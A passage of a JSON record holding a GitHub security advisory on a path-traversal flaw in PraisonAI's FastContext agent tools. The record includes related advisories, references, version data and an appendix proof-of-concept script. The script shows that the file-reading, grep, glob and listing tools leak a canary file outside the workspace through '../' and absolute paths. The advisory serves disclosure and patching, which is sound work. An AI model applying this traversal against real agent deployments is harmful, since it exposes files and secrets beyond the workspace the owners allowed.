0.0.190, <= 1.6.63\n```\n\nThe exact first released package version should be confirmed by maintainers from the `praisonaiagents.context.fast` release history, but the repository sweep shows the vulnerable FastContext files first present at the sampled `praisonaiagents 0.0.190` point and still vulnerable on current main.\n\n## Advisory History\n\nNo checked public advisory or local prior report matched the FastContext code-search workspace-boundary bypass in `praisonaiagents.context.fast`.\n\nClosest public comparators are related but distinct:\n\n- `GHSA-gcq3-mfvh-3x25`: PraisonAI Code agent tools fail open without a workspace boundary. That advisory covers `praisonai` Code `CODE_TOOLS` wrappers and unset workspace defaults for read/edit helpers. This report covers `praisonaiagents.context.fast.FastContextAgent` and `FastContext` with an explicitly configured `workspace_path`; the root cause is missing containment after path joining and raw model tool-call dispatch, not an unset global workspace.\n- `GHSA-j7qx-p75m-wp7g`: PraisonAI dynamic-context artifact tools read arbitrary host files outside artifact storage. That advisory covers Dynamic Context artifact tools that accept raw `artifact_path` values. This report covers FastContext code-search/read/list tools and the model-backed FastContext search loop.\n- `GHSA-22cj-m4wf-fv2c`: PraisonAI Dynamic Context history and terminal tools read files outside configured storage via path traversal. That advisory covers Dynamic Context history/terminal stores where `run_id` and `agent_id` are path components. This report covers FastContext's workspace root and file/search path tool arguments.\n- `GHSA-grrg-5cg9-58pf` / `CVE-2026-40117`: `read_skill_file()` arbitrary file read due missing workspace boundary and approval gate. This report does not use skill tools.\n- `GHSA-7j2f-xc8p-fjmq` / `CVE-2026-40152`: legacy `FileTools.list_files()` glob traversal. This report affects FastContext and can disclose file content through `read_file`/`grep_search`, not only metadata through FileTools glob patterns.\n- `GHSA-693f-pf34-72c5`: FileTools path traversal. This report is in `praisonaiagents.context.fast`, not `praisonaiagents.tools.file_tools`.\n- `GHSA-9cr9-25q5-8prj` and `GHSA-9mqq-jqxf-grvw`: MCP file/path traversal surfaces. This report does not use MCP.\n\nPublic issue/PR search found no hits for `FastContext arbitrary file read`, `\"Fast Context\" workspace boundary`, or `fast_context_agent` in `MervinPraison/PraisonAI`.\n\n## References\n\n- PraisonAI Fast Context docs: https://docs.praison.ai/docs/features/fast-context\n- PraisonAI tools docs, Fast Context section: https://docs.praison.ai/docs/concepts/tools\n- PraisonAI repository advisories: https://github.com/MervinPraison/PraisonAI/security/advisories\n- `GHSA-gcq3-mfvh-3x25`: https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-gcq3-mfvh-3x25\n- `GHSA-j7qx-p75m-wp7g`: https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-j7qx-p75m-wp7g\n- `GHSA-22cj-m4wf-fv2c`: https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-22cj-m4wf-fv2c\n- `GHSA-grrg-5cg9-58pf`: https://github.com/advisories/GHSA-grrg-5cg9-58pf\n- `GHSA-7j2f-xc8p-fjmq`: https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-7j2f-xc8p-fjmq\n- CWE-22: https://cwe.mitre.org/data/definitions/22.html\n- CWE-200: https://cwe.mitre.org/data/definitions/200.html\n\n## Appendix: Self-Contained FastContext Workspace PoC\n\n```python\n#!/usr/bin/env python3\nimport json\nfrom pathlib import Path\nfrom tempfile import TemporaryDirectory\n\nfrom praisonaiagents.context.fast import FastContext\nfrom praisonaiagents.context.fast.fast_context_agent import FastContextAgent\n\n\nCANARY = \"FAST_CONTEXT_CANARY=outside-workspace\"\n\n\ndef main() -> None:\n    with TemporaryDirectory(prefix=\"fastcontext-workspace-pov-\") as tmp:\n        temp_root = Path(tmp)\n        workspace = temp_root / \"workspace\"\n        workspace.mkdir()\n        inside = workspace / \"inside.txt\"\n        outside = temp_root / \"outside-secret.txt\"\n\n        inside.write_text(\"INSIDE_ONLY=workspace\\n\", encoding=\"utf-8\")\n        outside.write_text(CANARY + \"\\n\", encoding=\"utf-8\")\n\n        agent = FastContextAgent(str(workspace), max_turns=2, max_parallel=4)\n        simple_result = agent.search_simple(CANARY)\n        inside_result = agent.execute_tool(\"read_file\", filepath=\"inside.txt\")\n        relative_read = agent.execute_tool(\"read_file\", filepath=\"../outside-secret.txt\")\n        absolute_read = agent.execute_tool(\"read_file\", filepath=str(outside))\n        grep_parent = agent.execute_tool(\"grep_search\", search_path=\"..\", pattern=CANARY, max_results=5)\n        glob_parent = agent.execute_tool(\"glob_search\", search_path=\"..\", pattern=\"*.txt\", max_results=5)\n        list_parent = agent.execute_tool(\"list_directory\", dir_path=\"..\", max_entries=10)\n\n        context = FastContext(workspace_path=str(workspace), cache_enabled=False)\n        context_read = context.read_context(\"../outside-secret.txt\")\n\n        results = {\n            \"simple_search_does_not_find_outside_canary\": len(simple_result.files) == 0,\n            \"inside_read_still_works\": \"INSIDE_ONLY=workspace\" in inside_result.get(\"content\", \"\"),\n            \"relative_traversal_read_discloses_canary\": CANARY in relative_read.get(\"content\", \"\"),\n            \"absolute_read_discloses_canary\": CANARY in absolute_read.get(\"content\", \"\"),\n            \"grep_parent_discloses_canary\": any(CANARY in match.get(\"content\", \"\") for match in grep_parent),\n            \"glob_parent_reveals_outside_file\": any(match.get(\"path\") == \"outside-secret.txt\" for match in glob_parent),\n            \"list_parent_reveals_outside_file\": any(entry.get(\"name\") == \"outside-secret.txt\" for entry in list_parent.get(\"entries\", [])),\n            \"high_level_read_context_discloses_canary\": CANARY in (context_read or \"\"),\n        }\n\n        print(json.dumps({\"vulnerable\": all(results.values()), \"results\": results}, indent=2, sort_keys=True))\n\n\nif __name__ == \"__main__\":\n    main()\n```","summary":"PraisonAI: FastContext path resolution permits absolute and traversal reads outside the workspace","affected":[{"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"0"},{"fixed":"1.6.78"}]}],"package":{"name":"praisonaiagents","purl":"pkg:pypi/praisonaiagents","ecosystem":"PyPI"},"versions":["0.0.1","0.0.10","0.0.100","0.0.101","0.0.102","0.0.103","0.0.104","0.0.105","0.0.106","0.0.107","0.0.108","0.0.109","0.0.11","0.0.110","0.0.111","0.0.112","0.0.113","0.0.114","0.0.115","0.0.116","0.0.117","0.0.118","0.0.119","0.0.12","0.0.120","0.0.121","0.0.122","0.0.123","0.0.124","0.0.125","0.0.126","0.0.127","0.0.128","0.0.129","0.0.13","0.0.130","0.0.131","0.0.132","0.0.133","0.0.134","0.0.135","0.0.136","0.0.137","0.0.138","0.0.139","0.0.14","0.0.140","0.0.141","0.0.142","0.0.143","0.0.144","0.0.145","0.0.146","0.0.147","0.0.148","0.0.149","0.0.15","0.0.150","0.0.151","0.0.152","0.0.153","0.0.154","0.0.155","0.0.156","0.0.157","0.0.158","0.0.159","0.0.16","0.0.160","0.0.161","0.0.162","0.0.163","0.0.164","0.0.165","0.0.166","0.0.167","0.0.168","0.0.169","0.0.17","0.0.170","0.0.171","0.0.172","0.0.173","0.0.174","0.0.175","0.0.176","0.0.177","0.0.178","0.0.179","0.0.18","0.0.180","0.0.181","0.0.182","0.0.183","0.0.184","0.0.185","0.0.187","0.0.188","0.0.189","0.0.19","0.0.190","0.0.191","0.0.192","0.0.193","0.0.194","0.0.195","0.0.196","0.0.197","0.0.198","0.0.199","0.0.2","0.0.20","0.0.21","0.0.22","0.0.23","0.0.24","0.0.25","0.0.26","0.0.27","0.0.28","0.0.29","0.0.3","0.0.30","0.0.31","0.0.32","0.0.33","0.0.34","0.0.35","0.0.36","0.0.37","0.0.38","0.0.39","0.0.4","0.0.40","0.0.41","0.0.42","0.0.43","0.0.44","0.0.45","0.0.46","0.0.47","0.0.48","0.0.49","0.0.5","0.0.50","0.0.51","0.0.52","0.0.53","0.0.54","0.0.56","0.0.57","0.0.58","0.0.59","0.0.6","0.0.60","0.0.61","0.0.62","0.0.63","0.0.64","0.0.65","0.0.66","0.0.67","0.0.68","0.0.69","0.0.7","0.0.70","0.0.71","0.0.72","0.0.73","0.0.74","0.0.75","0.0.76","0.0.77","0.0.78","0.0.79","0.0.8","0.0.80","0.0.81","0.0.82","0.0.83","0.0.84","0.0.85","0.0.86","0.0.87","0.0.88","0.0.89","0.0.9","0.0.90","0.0.91","0.0.92","0.0.93","0.0.94","0.0.95","0.0.96","0.0.97","0.0.98","0.0.99","0.1.0","0.1.1","0.1.10","0.1.11","0.1.12","0.1.13","0.1.14","0.1.15","0.1.16","0.1.17","0.1.18","0.1.19","0.1.2","0.1.20","0.1.21","0.1.22","0.1.23","0.1.24","0.1.25","0.1.26","0.1.27","0.1.3","0.1.4","0.1.5","0.1.6","0.1.7","0.1.8","0.1.9","0.10.0","0.10.1","0.10.10","0.10.2","0.10.3","0.10.4","0.10.5","0.10.6","0.10.7","0.10.8","0.10.9","0.11.0","0.11.1","0.11.10","0.11.11","0.11.12","0.11.13","0.11.14","0.11.15","0.11.16","0.11.17","0.11.18","0.11.19","0.11.2","0.11.20","0.11.21","0.11.22","0.11.23","0.11.24","0.11.25","0.11.27","0.11.28","0.11.29","0.11.3","0.11.30","0.11.31","0.11.4","0.11.5","0.11.6","0.11.7","0.11.8","0.11.9","0.12.0","0.12.1","0.12.10","0.12.11","0.12.12","0.12.13","0.12.14","0.12.15","0.12.16","0.12.17","0.12.18","0.12.19","0.12.2","0.12.20","0.12.21","0.12.3","0.12.4","0.12.5","0.12.6","0.12.7","0.12.8","0.12.9","0.13.0","0.13.1","0.13.10","0.13.11","0.13.12","0.13.13","0.13.14","0.13.15","0.13.16","0.13.17","0.13.18","0.13.19","0.13.2","0.13.20","0.13.21","0.13.22","0.13.23","0.13.3","0.13.4","0.13.5","0.13.6","0.13.7","0.13.8","0.13.9","0.14.0","0.14.1","0.14.10","0.14.11","0.14.12","0.14.14","0.14.15","0.14.16","0.14.2","0.14.3","0.14.4","0.14.5","0.14.6","0.14.7","0.14.8","0.14.9","0.15.0","0.15.1","0.15.2","0.15.3","0.2.0","0.2.1","0.2.2","0.3.0","0.3.1","0.3.2","0.3.3","0.3.4","0.4.0","0.4.1","0.5.0","0.5.1","0.5.2","0.5.3","0.6.0","0.6.1","0.6.2","0.6.3","0.6.4","0.6.5","0.6.6","0.6.7","0.6.8","0.7.0","0.7.1","0.8.0","0.8.1","0.9.0","0.9.1","1.0.0","1.1.0","1.2.0","1.2.1","1.2.2","1.2.3","1.2.4","1.3.0","1.3.1","1.4.0","1.4.1","1.4.2","1.4.3","1.4.4","1.4.5","1.4.6","1.4.7","1.4.8","1.5.0","1.5.1","1.5.10","1.5.100","1.5.101","1.5.102","1.5.103","1.5.104","1.5.105","1.5.106","1.5.107","1.5.108","1.5.109","1.5.11","1.5.110","1.5.111","1.5.112","1.5.113","1.5.114","1.5.115","1.5.116","1.5.117","1.5.118","1.5.119","1.5.12","1.5.120","1.5.121","1.5.122","1.5.123","1.5.124","1.5.125","1.5.126","1.5.127","1.5.128","1.5.129","1.5.13","1.5.130","1.5.131","1.5.132","1.5.133","1.5.134","1.5.135","1.5.136","1.5.137","1.5.138","1.5.139","1.5.14","1.5.140","1.5.141","1.5.142","1.5.143","1.5.144","1.5.145","1.5.146","1.5.147","1.5.148","1.5.149","1.5.15","1.5.16","1.5.17","1.5.18","1.5.19","1.5.2","1.5.20","1.5.21","1.5.22","1.5.23","1.5.24","1.5.25","1.5.26","1.5.27","1.5.28","1.5.29","1.5.3","1.5.30","1.5.31","1.5.32","1.5.33","1.5.34","1.5.35","1.5.36","1.5.37","1.5.38","1.5.39","1.5.40","1.5.41","1.5.42","1.5.43","1.5.44","1.5.45","1.5.46","1.5.47","1.5.48","1.5.49","1.5.5","1.5.50","1.5.51","1.5.52","1.5.53","1.5.54","1.5.55","1.5.56","1.5.57","1.5.58","1.5.59","1.5.6","1.5.60","1.5.61","1.5.62","1.5.63","1.5.64","1.5.65","1.5.66","1.5.67","1.5.68","1.5.69","1.5.7","1.5.70","1.5.71","1.5.72","1.5.73","1.5.74","1.5.75","1.5.76","1.5.77","1.5.78","1.5.79","1.5.8","1.5.80","1.5.81","1.5.82","1.5.83","1.5.84","1.5.85","1.5.86","1.5.87","1.5.88","1.5.89","1.5.9","1.5.90","1.5.91","1.5.92","1.5.93","1.5.94","1.5.95","1.5.96","1.5.97","1.5.98","1.5.99","1.6.1","1.6.10","1.6.11","1.6.12","1.6.13","1.6.14","1.6.15","1.6.16","1.6.17","1.6.18","1.6.19","1.6.2","1.6.20","1.6.21","1.6.22","1.6.23","1.6.24","1.6.25","1.6.26","1.6.27","1.6.28","1.6.29","1.6.3","1.6.30","1.6.31","1.6.32","1.6.33","1.6.34","1.6.35","1.6.36","1.6.37","1.6.38","1.6.39","1.6.4","1.6.40","1.6.41","1.6.42","1.6.43","1.6.44","1.6.45","1.6.46","1.6.47","1.6.48","1.6.5","1.6.50","1.6.51","1.6.52","1.6.53","1.6.54","1.6.55","1.6.56","1.6.57","1.6.58","1.6.59","1.6.6","1.6.60","1.6.62","1.6.63","1.6.64","1.6.65","1.6.66","1.6.67","1.6.68","1.6.69","1.6.7","1.6.70","1.6.71","1.6.72","1.6.73","1.6.74","1.6.75","1.6.76","1.6.77","1.6.8","1.6.9"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/10/GHSA-4xxv-6wmf-xf45/GHSA-4xxv-6wmf-xf45.json","last_known_affected_version_range":"<= 1.6.77"}}],"modified":"2026-10-08T17:00:11.828760842Z","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N"}],"published":"2026-10-08T16:48:52Z","references":[{"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-4xxv-6wmf-xf45","type":"WEB"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-61432","type":"ADVISORY"},{"url":"https://github.com/MervinPraison/PraisonAI/commit/1620b49f36945d8cc8ee5635b906c960df5097a0","type":"WEB"},{"url":"https://github.com/MervinPraison/PraisonAI","type":"PACKAGE"},{"url":"https://www.vulncheck.com/advisories/praisonai-fastcontext-before-path-traversal","type":"WEB"}],"schema_version":"1.9.0","database_specific":{"cwe_ids":["CWE-200","CWE-22"],"severity":"MODERATE","github_reviewed":true,"nvd_published_at":null,"github_reviewed_at":"2026-10-08T16:48:52Z"}}}],"pagination":{"page":1,"limit":20,"total":1,"totalPages":1,"hasNext":false,"hasPrev":false}},"meta":{"apiVersion":"v1","requestedAt":"2026-10-08T23:13:54.537Z","durationMs":11,"filters":{"search":null,"severity":[],"type":[],"country":[],"tag":[],"cwe":[],"vendor":null,"product":null,"cve":"CVE-2026-61432","source":[],"days":null,"publishedAfter":null,"publishedBefore":null,"minCvss":null,"maxCvss":null,"minEpss":null,"knownExploited":null,"hasPatch":null,"hasNucleiTemplate":null},"sort":"newest","unknownParams":["include"],"warnings":[]}}